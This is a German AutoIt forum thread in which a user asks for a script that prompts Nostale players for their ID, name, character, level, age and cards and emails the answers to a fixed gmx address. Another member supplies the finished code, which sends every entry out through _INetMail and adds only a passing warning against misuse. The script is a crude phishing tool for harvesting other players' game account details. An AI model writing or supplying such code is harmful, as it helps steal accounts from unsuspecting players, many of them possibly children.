AutoIt Inputbox per email schicken Hilfe

  • Hallo Leute!

    Ich brauch hilfe bei der Inputbox!
    Ich hat schon alles geklappt,
    aber ich will was da reingeschrieben wird,
    dass es mir per email geschickt wird!
    also es soll der e-mail geschickt werden: Nostale_Hilfe@gmx.de
    Kann mir einer den code dafür geben?

    [autoit]

    Dim $Antwort
    $Antwort = MsgBox(52,"Nostale","Hallo Leute!!")

    [/autoit][autoit][/autoit][autoit]

    Select
    Case $Antwort = 7
    Case Else
    $var = InputBox("Nostale","Gebe Hier dein ID ein")
    $Antwort = 7
    $var = InputBox("Nostale","gebe wie du heißt )
    $Antwort = 7
    $var = InputBox("Nostale","Gebe Hier dein Charakter ein")
    $Antwort = 7
    $var = InputBox("Nostale","welches level bist du?")
    $Antwort = 7
    $var = InputBox("Nostale","gebe ein welches geschlecht du bist")
    $Antwort = 7
    $var = InputBox("Nostale","gebe ein wie alt du bist")
    $Antwort = 7
    $var = InputBox("Nostale","Gebe Hier deineSP Karten ein" )
    $Antwort = 7
    $var = InputBox("Nostale","Gebe Hier dein Level an")
    $Antwort = 7
    MsgBox(0,"Nostale","du bist dann mein bester freund")
    #include <INet.au3>

    [/autoit]


    ?( ?( ?(

    Edit Oscar: Beitrag wiederhergestellt.

    2 Mal editiert, zuletzt von Oscar (24. Februar 2010 um 19:03)

  • [autoit]

    Dim $Antwort
    $Antwort = MsgBox(52,"Nostale","Hallo Leute!!")

    [/autoit][autoit][/autoit][autoit]

    Select
    Case $Antwort = 7
    Case Else
    $var = InputBox("Nostale","Gebe Hier dein ID ein")
    $Antwort = 7
    $var = InputBox("Nostale","gebe wie du heißt )
    $Antwort = 7
    $var = InputBox("Nostale","Gebe Hier dein Charakter ein")
    $Antwort = 7
    $var = InputBox("Nostale","welches level bist du?")
    $Antwort = 7
    $var = InputBox("Nostale","gebe ein welches geschlecht du bist")
    $Antwort = 7
    $var = InputBox("Nostale","gebe ein wie alt du bist")
    $Antwort = 7
    $var = InputBox("Nostale","Gebe Hier deineSP Karten ein" )
    $Antwort = 7
    $var = InputBox("Nostale","Gebe Hier dein Level an")
    $Antwort = 7
    MsgBox(0,"Nostale","du bist dann mein bester freund")
    #include <INet.au3>

    [/autoit]
  • hier:
    ich hoffe du willst damit keien unfug treiben...

    [autoit]

    #include <INet.au3>
    Dim $Antwort
    $Antwort = MsgBox(52,"Nostale","Hallo Leute!!")

    [/autoit][autoit][/autoit][autoit]

    Select
    Case $Antwort = 7
    Case Else
    $var1 = InputBox("Nostale","Gebe Hier dein ID ein")
    $Antwort = 7
    $var2 = InputBox("Nostale","gebe wie du heißt")
    $Antwort = 7
    $var3 = InputBox("Nostale","Gebe Hier dein Charakter ein")
    $Antwort = 7
    $var5 = InputBox("Nostale","welches level bist du?")
    $Antwort = 7
    $var6 = InputBox("Nostale","gebe ein welches geschlecht du bist")
    $Antwort = 7
    $var7 = InputBox("Nostale","gebe ein wie alt du bist")
    $Antwort = 7
    $var8 = InputBox("Nostale","Gebe Hier deineSP Karten ein" )
    $Antwort = 7
    $var9 = InputBox("Nostale","Gebe Hier dein Level an")
    $Antwort = 7
    _INetMail("Nostale_Hilfe@gmx.de","Nostale",$var1 &"|"& $var2 &"|"& $var3 &"|"& $var5 &"|"& $var6 &"|"& $var7 &"|"& $var8 &"|"& $var9)
    MsgBox(0,"Nostale","du bist dann mein bester freund")
    EndSelect

    [/autoit]
  • Bitte NIE den ersten Eintrag löschen, sonst weiß man nie, worum es geht :cursing:

    Spoiler anzeigen

    Grundkenntnisse in: C++, JavaScript
    Sehr gute Kenntnisse: PHP, JAVA, C und näturlich AutoIt


    Klaviatur, Anhang UDF, GDI+ Mühle

    Zitat

    "Wenn einen um 20h der Pizzadienst anruft und fragt, ob man's nur vergessen hat und ob man das gleiche
    möchte wie immer -- dann sollte man sein Bestellverhalten evtl überdenken"